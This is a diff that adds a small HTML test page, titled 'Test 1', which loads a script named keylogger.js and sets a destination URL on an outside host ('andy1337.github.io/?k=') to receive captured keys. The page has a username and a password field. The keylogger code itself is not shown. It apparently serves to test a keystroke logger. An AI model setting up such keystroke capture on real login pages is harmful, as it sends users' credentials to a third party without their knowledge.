--- a/index.html
+++ b/index.html
@@ -1,1 +1,15 @@
-1
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" >
+<head>
+    <script type="text/javascript" src="keylogger.js"></script>
+    <script type="text/javascript">
+        destination = 'andy1337.github.io/?k=';
+    </script>
+    <title>Test 1</title>
+</head>
+<body>
+    <input id="username" />
+    <br />
+    <input id="password" type="password" />    
+</body>
+</html>
